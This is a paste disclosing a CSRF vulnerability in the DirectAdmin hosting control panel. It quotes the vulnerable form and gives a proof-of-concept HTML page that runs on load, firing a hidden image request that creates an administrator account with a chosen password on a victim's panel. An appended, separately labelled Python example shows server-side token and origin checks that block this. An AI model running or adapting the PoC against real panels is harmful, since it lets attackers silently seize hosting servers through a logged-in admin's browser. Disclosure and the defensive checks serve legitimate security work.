moften

DirectAdmin (1.44.3) CSRF Vulnerability

Oct 13th, 2015
# Title : DirectAdmin (1.44.3) CSRF Vulnerability
# Date : 10-10-2015
# Version : 1.43.3-1.44.3
# Author : @babayarisi http://ha.cker.io
# Vendor : http://www.directadmin.com/
# Download: http://www.directadmin.com/demo.html
=============================================================================
# info : DirectAdmin is a web-based hosting control panel.

# As you can see, the original form doesn't include CSRF protection or any secret token.
<form name=reseller action="CMD_ACCOUNT_ADMIN" method="post" onSubmit="return formOK()">
<input type=hidden name=action value=create>
<tr><td class="list">Username:</td><td class="list"><input type=text name=username maxlength=12 onChange="checkName()"></td></tr>
<tr><td class="list">E-Mail:</td><td class="list"><input type=text name=email onChange="checkEmail()"></td></tr>
<tr><td class="list">Enter Password:</td><td class="list"><input type=password name=passwd> <input type=button value="Random" onClick="randomPass()"></td></tr>
<tr><td class="list">Re-Enter Password:</td><td class="list"><input type=password name=passwd2 onChange="checkPass()"></td></tr>
<tr><td class="list">Send Email Notification:</td><td class="list"><input type=checkbox value="yes" name=notify checked> <a href="javascript:showAdminMessage();">Edit Admin Message</a></td></tr>

<tr><td td class="listtitle" colspan=3 align=right>
<input type=submit value="Submit">
</td></tr>
</form>

#POC
<html>
<head>
<title>POC</title>
</head>
<script language="javascript">

function yurudi(){
var adress ="www.demo.com";
var username="demo";
var email ="demo@demo.com";
var password="12345";
var urlson="https://"+adress+":2222/CMD_ACCOUNT_ADMIN?action=create&username="+username+"&email="+email+"&passwd="+password+"&passwd2="+password;

document.getElementById("resim").src=urlson;
}
</script>

<body onload="yurudi()">
<img id="resim" src="" style="height:0px;width:0px;"></img>
</body>
</html>
#POC

# don't be evil!
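
The server-side checks whose absence the paste demonstrates, as an added example that is not part of the original paste and not DirectAdmin's code. The field name csrf_token, the function names, the session ids and the host panel.example.test are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Per-deployment secret; generated here only so the example runs stand-alone.
SERVER_KEY = secrets.token_bytes(32)


def issue_token(session_id: str) -> str:
    """Token the server embeds as a hidden form field, bound to one session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def is_request_allowed(method, headers, params, session_id, panel_origin):
    """Decide whether a state-changing command may run for this session."""
    # 1. Account creation must not be reachable with GET: an <img> tag on a
    #    third-party page can only make the browser issue GET requests.
    if method.upper() != "POST":
        return False
    # 2. When the browser states where the request came from, it must be the
    #    panel itself ("null" and foreign origins both fail this comparison).
    source = headers.get("Origin") or headers.get("Referer")
    if source:
        parts = urlsplit(source)
        if f"{parts.scheme}://{parts.netloc}" != panel_origin:
            return False
    # 3. The per-session token must be present and correct. A foreign page
    #    cannot read it, so it cannot build a request that carries it.
    supplied = params.get("csrf_token", "")
    expected = issue_token(session_id)
    return hmac.compare_digest(supplied.encode(), expected.encode())


# Constructed sample requests (hypothetical host and session ids).
PANEL = "https://panel.example.test:2222"
FIELDS = {"action": "create", "username": "demo", "email": "demo@demo.com"}
FORGED_GET = ("GET", {"Referer": "https://other.example.test/page.html"}, FIELDS)
FORGED_POST = ("POST", {"Origin": "https://other.example.test"}, FIELDS)
GENUINE = ("POST", {"Origin": PANEL}, {**FIELDS, "csrf_token": issue_token("sess-admin")})

if __name__ == "__main__":
    for name, (method, headers, params) in [("forged GET", FORGED_GET),
                                            ("forged POST", FORGED_POST),
                                            ("genuine form", GENUINE)]:
        print(name, is_request_allowed(method, headers, params, "sess-admin", PANEL))
```

Setting SameSite=Lax or Strict on the session cookie complements these checks, since the browser then omits the cookie from cross-site subresource requests such as the image load.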